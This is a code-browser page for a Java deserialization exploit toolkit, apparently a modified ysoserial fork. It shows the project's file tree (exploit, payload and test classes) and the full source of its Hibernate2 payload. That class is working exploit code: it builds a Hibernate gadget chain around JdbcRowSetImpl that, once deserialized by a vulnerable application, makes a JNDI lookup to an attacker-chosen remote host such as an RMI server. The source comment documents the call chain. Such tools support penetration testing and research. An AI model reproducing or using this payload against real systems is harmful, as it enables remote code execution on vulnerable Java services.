java source code of Hibernate2

Project: ysoserial-modified (GitHub Link)

ysoserial-modified-master
- src
  - main
    - java
      - ysoserial
        exploit
        JenkinsListener.java
        RMIRegistryExploit.java
        JBoss.java
        JSF.java
        JenkinsReverse.java
        JRMPClassLoadingListener.java
        JRMPClient.java
        JRMPListener.java
        JenkinsCLI.java
        Serializer.java
        GeneratePayload.java
        secmgr
        ThreadLocalSecurityManager.java
        ExecCheckingSecurityManager.java
        DelegateSecurityManager.java
        Deserializer.java
        payloads
        BeanShell1.java
        JavassistWeld1.java
        Myfaces2.java
        CommonsCollections2.java
        Spring2.java
        JBossInterceptors1.java
        CommonsCollections4.java
        Spring1.java
        MozillaRhino1.java
        Hibernate1.java
        JRMPClient.java
        JSON1.java
        util
        ClassFiles.java
        CmdExecuteHelper.java
        JavaVersion.java
        Reflections.java
        PayloadRunner.java
        Gadgets.java
        FileUpload1.java
        JRMPListener.java
        Jython1.java
        Myfaces1.java
        Hibernate2.java
        Wicket1.java
        Groovy1.java
        DynamicDependencies.java
        ROME.java
        C3P0.java
        annotation
        PayloadTest.java
        Dependencies.java
        CommonsCollections1.java
        Jdk7u21.java
        CommonsCollections3.java
        CommonsBeanutils1.java
        CommonsCollections5.java
        CommonsCollections6.java
        ReleaseableObjectPayload.java
        ObjectPayload.java
  - test
    - java
      - nanohttpd-2.1.0.jar
      - ysoserial
        exploit
        RMIRegistryExploitTest.java
        WrappedTest.java
        CustomPayloadArgs.java
        CustomDeserializer.java
        CustomTest.java
        Throwables.java
        payloads
        RemoteClassLoadingTest.java
        PayloadsTest.java
        MyfacesTest.java
        JRMPReverseConnectSMTest.java
        FileUploadTest.java
        JRMPReverseConnectTest.java
        TestHarnessTest.java
- all.policy
- pom.xml
- README.md
- DISCLAIMER.txt
- target
  - classes
    - ysoserial
      - exploit
        JenkinsReverse.class
        JBoss$ConnectionProviderContextImpl.class
        RMIRegistryExploit$1.class
        JRMPClassLoadingListener.class
        JenkinsCLI.class
        JBoss.class
        JSF.class
        JenkinsCLI$1.class
        JRMPClient.class
        JenkinsListener.class
        JRMPListener$Dummy.class
        JBoss$1.class
        JBoss$ConnectionProviderContextImpl$1.class
        JRMPListener$1.class
        JRMPListener.class
        RMIRegistryExploit.class
        JRMPClient$MarshalOutputStream.class
        JBoss$ConsoleLogHandler.class
        JBoss$ConnectionHandlerContextImpl.class
        JRMPListener$2.class
      - Deserializer.class
      - GeneratePayload$ToStringComparator.class
      - secmgr
        ThreadLocalSecurityManager.class
        DelegateSecurityManager.class
        ExecCheckingSecurityManager.class
        ExecCheckingSecurityManager$1.class
        ExecCheckingSecurityManager$ExecException.class
      - GeneratePayload.class
      - Serializer.class
      - payloads
        CommonsCollections4.class
        JBossInterceptors1.class
        Spring2.class
        Jdk7u21.class
        JavassistWeld1.class
        JavassistWeld1$1.class
        CommonsCollections1.class
        JRMPClient.class
        Hibernate2.class
        Spring1.class
        Wicket1.class
        util
        ClassFiles.class
        PayloadRunner$1.class
        Gadgets$Foo.class
        Gadgets.class
        Reflections.class
        Gadgets$StubTransletPayload.class
        PayloadRunner.class
        JavaVersion.class
        CmdExecuteHelper.class
        DynamicDependencies.class
        JBossInterceptors1$1.class
        ReleaseableObjectPayload.class
        CommonsCollections3.class
        CommonsCollections2.class
        CommonsBeanutils1.class
        Myfaces1.class
        FileUpload1.class
        JRMPListener.class
        Myfaces2.class
        annotation
        Dependencies.class
        Dependencies$Utils.class
        PayloadTest.class
        CommonsCollections6.class
        Groovy1.class
        C3P0$PoolSource.class
        ROME.class
        ObjectPayload$Utils.class
        Jython1.class
        JSON1.class
        Hibernate1.class
        C3P0.class
        ObjectPayload.class
        MozillaRhino1.class
        CommonsCollections5.class
        BeanShell1.class
  - ysoserial-0.0.5-SNAPSHOT.jar
  - test-classes
    - ysoserial
      - CustomPayloadArgs.class
      - Throwables.class
      - exploit
        RMIRegistryExploitTest.class
      - WrappedTest.class
      - CustomDeserializer.class
      - CustomTest.class
      - payloads
        JRMPReverseConnectSMTest$1.class
        MyfacesTest$1.class
        PayloadsTest$1.class
        RemoteClassLoadingTest$RemoteClassLoadingTestCallable.class
        PayloadsTest$3.class
        JRMPReverseConnectSMTest.class
        PayloadsTest.class
        TestHarnessTest$ExecMockPayload.class
        TestHarnessTest.class
        MyfacesTest$MyfacesDeserializer$MockRequestContext.class
        MyfacesTest.class
        TestHarnessTest$ExecMockSerializable.class
        MyfacesTest$MyfacesDeserializer$MockELResolver.class
        TestHarnessTest$NoopMockPayload.class
        FileUploadTest.class
        RemoteClassLoadingTest.class
        PayloadsTest$2.class
        RemoteClassLoadingTest$Exploit.class
        JRMPReverseConnectTest.class
        MyfacesTest$MyfacesDeserializer.class
  - maven-archiver
    - pom.properties
  - maven-status
    - maven-compiler-plugin
      - compile
        default-compile
        createdFiles.lst
        inputFiles.lst
      - testCompile
        default-testCompile
        createdFiles.lst
        inputFiles.lst
- LICENSE.txt

package ysoserial.payloads;


import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.CmdExecuteHelper;
import ysoserial.payloads.util.PayloadRunner;

import com.sun.rowset.JdbcRowSetImpl;


/**
 * 
 * Another application filter bypass
 * 
 * Needs a getter invocation that is provided by hibernate here
 * 
 * javax.naming.InitialContext.InitialContext.lookup()
 * com.sun.rowset.JdbcRowSetImpl.connect()
 * com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData()
 * org.hibernate.property.access.spi.GetterMethodImpl.get()
 * org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
 * org.hibernate.type.ComponentType.getPropertyValue(C)
 * org.hibernate.type.ComponentType.getHashCode()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.engine.spi.TypedValue$1.initialize()
 * org.hibernate.internal.util.ValueHolder.getValue()
 * org.hibernate.engine.spi.TypedValue.hashCode()
 * 
 * 
 * Requires:
 * - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only)
 * 
 * Arg:
 * - JNDI name (i.e. rmi:<host>)
 * 
 * Yields:
 * - JNDI lookup invocation (e.g. connect to remote RMI)
 * 
 * @author mbechler
 */
@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectTest")
public class Hibernate2 implements ObjectPayload<Object>, DynamicDependencies {

    public static String[] getDependencies () {
        return Hibernate1.getDependencies();
    }
   
    public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
        JdbcRowSetImpl rs = new JdbcRowSetImpl();
        rs.setDataSourceName(cmdHelper.getCommand());
        return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
    }


    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(Hibernate2.class, args);
    }
}